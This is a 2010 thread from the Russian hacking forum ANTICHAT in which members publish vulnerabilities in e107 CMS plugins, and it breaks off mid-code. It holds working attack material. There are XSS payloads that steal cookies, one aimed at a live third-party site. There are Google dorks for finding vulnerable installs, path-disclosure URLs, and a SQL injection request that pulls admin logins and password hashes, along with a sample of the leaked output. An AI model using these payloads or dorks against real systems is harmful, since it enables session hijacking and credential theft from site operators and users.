ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.05.2010, 16:42
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от ReckouNT
Подскажите уязвимости в ядре 0.7.17, с этой версии были выпущены заплатки на какие то уязвимости - (хз на какие)
Через плагины поломать невозможно, т.к. из плагинов юзается лишь guestbook.
И гостевуха уязвимая, ette находил активную XSS, а в случае с e107 где в плюшках лежит хеш, да и на админку пароля вроде как нет, это фатально.
|
|
|
27.08.2010, 01:08
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
eBattles
eBattles Version 0.7.229(другие версии не тестил)
Зависимости нету
Пассивная XSS
\e107_v0.7.16_full\e107_plugins\ebattles\clanmanag e.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/* Clan Name */
[/COLOR][COLOR="#0000BB"]$clan_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'clanid'[/COLOR][COLOR="#007700"]];
if (![/COLOR][COLOR="#0000BB"]$clan_id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ./clans.php"[/COLOR][COLOR="#007700"]);
exit();
}
else
{[/COLOR][/COLOR]
Result: http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/clanmanage.php?clanid=1">alert(document.cookie)
\e107_v0.7.16_full\e107_plugins\ebattles\eventinfo .php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$event_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'eventid'[/COLOR][COLOR="#007700"]];
if (![/COLOR][COLOR="#0000BB"]$event_id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ./events.php"[/COLOR][COLOR="#007700"]);
exit();
}
else
{
[/COLOR][/COLOR]
Result: http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/eventinfo.php?eventid=1">alert(document.cookie)
Off Site:
Код:
Code:
http://ebattles.freehostia.com/e107_plugins/ebattles/eventinfo.php?eventid=31">alert(document.cookie)
|
|
|
|
28.08.2010, 04:58
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
MyBlogs Version 0.72
Пассивная XSS
\e107_plugins\myblog_menu\myblog.php
Result: http://localhost/e107_plugins/myblog_menu/myblog.php?a=profile&s=newpost
Text:
Caption:
Tags:
Активная xss
site.ru/e107_plugins/myblog_menu/myblog.php?a=tag
Search on tagwords:">alert()
|
|
|
|
30.08.2010, 13:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Library Module v1.1
Дорк такой:e107_plugins/library
не прикрыто штаксесом:
http://[host]/[path]/e107_plugins/library/
раскрытие путей:
http://[host]/[path]//e107_plugins/library/search.php
http://[host]/[path]/e107_plugins/library/help.php
http://[host]/[path]/e107_plugins/library/admin_menu.php
в последнем admin_menu.php варнинг на require, и там же можно сделать редирект --> только бестолку.
В library.php возможно есть иньекция при mg=off.
нашел pxss
e107_plugins/library/admin_menu.php
[PHP]
PHP:
[COLOR="#000000"]$menutitle="Virtual Library";
$butname[] ="Main Library Page";// Admin Menu Button Name
$butlink[] ="library_conf.php";// Admin Menu Button Link.
for ($i=0;$i[COLOR="#007700"]
[/HTML]
ну когда rg=on
ну а что я сделаю => этот плагин древний, кажетцо с 2005.
вот примерчик сразу первый.
|
|
|
|
30.08.2010, 13:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Не знаю было или не, но пишу:
скачал Plugins > E-Commerce > Notice Board на plugins.e107.org [скачать]
Author sunout
Date 13:10 14-May-10
дорк: inurl:e107_plugins/nboard
e107_plugins/nboard/viewads.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"../../class2.php"[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]e_HANDLER[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"form_handler.php"[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]e_HANDLER[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"userclass_class.php"[/COLOR][COLOR="#007700"]);
@include_once([/COLOR][COLOR="#0000BB"]e_PLUGIN[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"nboard/languages/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]e_LANGUAGE[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$ns[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]e107table[/COLOR][COLOR="#007700"];
require_once([/COLOR][COLOR="#0000BB"]HEADERF[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#DD0000"]"classmen.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$uspage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]e_BASE[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'scat'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$act[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"act"[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//==================================Debug=======================================
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$act[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"det"[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"nb_gnl"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"gnl_id='[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#DD0000"]' "[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){
[/COLOR][COLOR="#0000BB"]$gnl_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_city[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_city'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_picbig[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_picbig'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_small[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_picsmall'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_detail[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_detail'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_user'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_phone[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_phone'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_email'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_date'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_price[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_price'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$gnl_kikoz[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_kikoz'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]/*...*/
////вывод где то там
[/COLOR][COLOR="#007700"]}
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$caption[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]NB_NAME_6[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$ns[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tablerender[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$caption[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]FOOTERF[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
екплоенг:
Код:
Code:
http://localhost/e107/e107_plugins/nboard/viewads.php?act=det&scat=1%27%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+
условие mg=0ff
e107_plugins/nboard/nboard.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'scat'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"page"[/COLOR][COLOR="#007700"]]
[/COLOR][COLOR="#FF8000"]/*...*/
//====================== all_select ============================//
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sql_cat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$begin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// откуда начинать
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE gnl_scatid in (select subcat_id from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"nb_subcat where subcat_catid=[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#DD0000"]) ORDER BY gnl_id DESC LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$begin[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
return[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// записей на страницу
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"nb_gnl"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// из какой таблицы
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]();[/COLOR][COLOR="#FF8000"]// определяем страницу
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$gnl_pigbig[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_cat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$gnl_pigbig[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$result_scat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_scat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$gnl_pigbig[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]
Теперь никаких условий должно быть, кстате там подзапрос, тоесть со скобкой вылазить надо.
Еще есть одна SQL inj в файле, но mg=off надо.
Запарилсо добиватца вывода и кнопать => Если нет значения в nb_cat, то уязвимость неексплуатируемая.
У кого есть желание смотрите.
короче через ошибку:
Код:
Code:
http://localhost/e107/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
Сообщение от None
Duplicate entry 'admin:21232f297a57a5a743894a0e4a801fc3:1' for key 1
|
|
|
|
31.08.2010, 23:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
1
pXSS
nlstart uploaded EasyShop v1.54 26Aug10
скачать
http://[host]/[path]/e107_plugins/easyshop/easyshop_sql.php - стурктура БД плагина
/e107_plugins/easyshop/easyshop_basket.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
// Filling basket from product = P; return to product overview
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'fill_basket'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'C'[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'fill_basket'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'P'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// refresh_cart(); // IPN addition // might screw up the session variables
// IPN addition - sets two variables to help keep coding neat later on
[/COLOR][COLOR="#007700"]isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]])?[/COLOR][COLOR="#0000BB"]$action_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]]:[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"];
isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$action_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'item_track_stock'[/COLOR][COLOR="#007700"]])
&& ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$action_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'quantity'[/COLOR][COLOR="#007700"]]) [/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'quantity'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_qty'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'item_price'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_price'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'sku_number'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sku_number'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'shipping'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shipping'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'shipping2'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shipping2'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'handling'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'handling'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'db_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'db_id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#FF8000"]// Handling costs are calculated once per each basket
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sc_total'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'handling'[/COLOR][COLOR="#007700"]] += (double)[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'handling'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// IPN addition - check to see if we're tracking stock, if so put stock amount into SESSION ARRAY
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_track_stock'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]]][[/COLOR][COLOR="#DD0000"]'item_instock'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_instock'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]]][[/COLOR][COLOR="#DD0000"]'item_track_stock'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_track_stock'[/COLOR][COLOR="#007700"]];
}
}
else if (!isset([/COLOR][COLOR="#0000BB"]$track_stock[/COLOR][COLOR="#007700"]) || isset([/COLOR][COLOR="#0000BB"]$allow_add[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#FF8000"]// IPN addition check quantity against item_instock
// Key for item id does exist; only quantity needs to raised
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]]][[/COLOR][COLOR="#DD0000"]'quantity'[/COLOR][COLOR="#007700"]] +=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_qty'[/COLOR][COLOR="#007700"]];
}
if (!isset([/COLOR][COLOR="#0000BB"]$track_stock[/COLOR][COLOR="#007700"]) || isset([/COLOR][COLOR="#0000BB"]$allow_add[/COLOR][COLOR="#007700"])){[/COLOR][COLOR="#FF8000"]// IPN addition - don't increment if quantity is at max stock level
// Fill the sc_total array
[/COLOR][COLOR="#0000BB"]$previous_nr_of_items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'quantity'[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#FF8000"]// Fix bug #88
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sc_total'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'items'[/COLOR][COLOR="#007700"]] +=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_qty'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sc_total'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'sum'[/COLOR][COLOR="#007700"]] += (double)[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_price'[/COLOR][COLOR="#007700"]] *[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_qty'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// Extra shippings costs are conditioned (only calculate for first product)
[/COLOR][COLOR="#007700"]if ((integer)([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]]][[/COLOR][COLOR="#DD0000"]'quantity'[/COLOR][COLOR="#007700"]]) >=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]$previous_nr_of_items[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#FF8000"]// Fix bug #81
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sc_total'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'shipping'[/COLOR][COLOR="#007700"]] += (double)[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shipping'[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#FF8000"]// PayPal charges shipping2 costs for all items above quantity of 2
[/COLOR][COLOR="#007700"]if ((integer)([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shopping_cart'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_id'[/COLOR][COLOR="#007700"]]][[/COLOR][COLOR="#DD0000"]'quantity'[/COLOR][COLOR="#007700"]]) >[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]$previous_nr_of_items[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
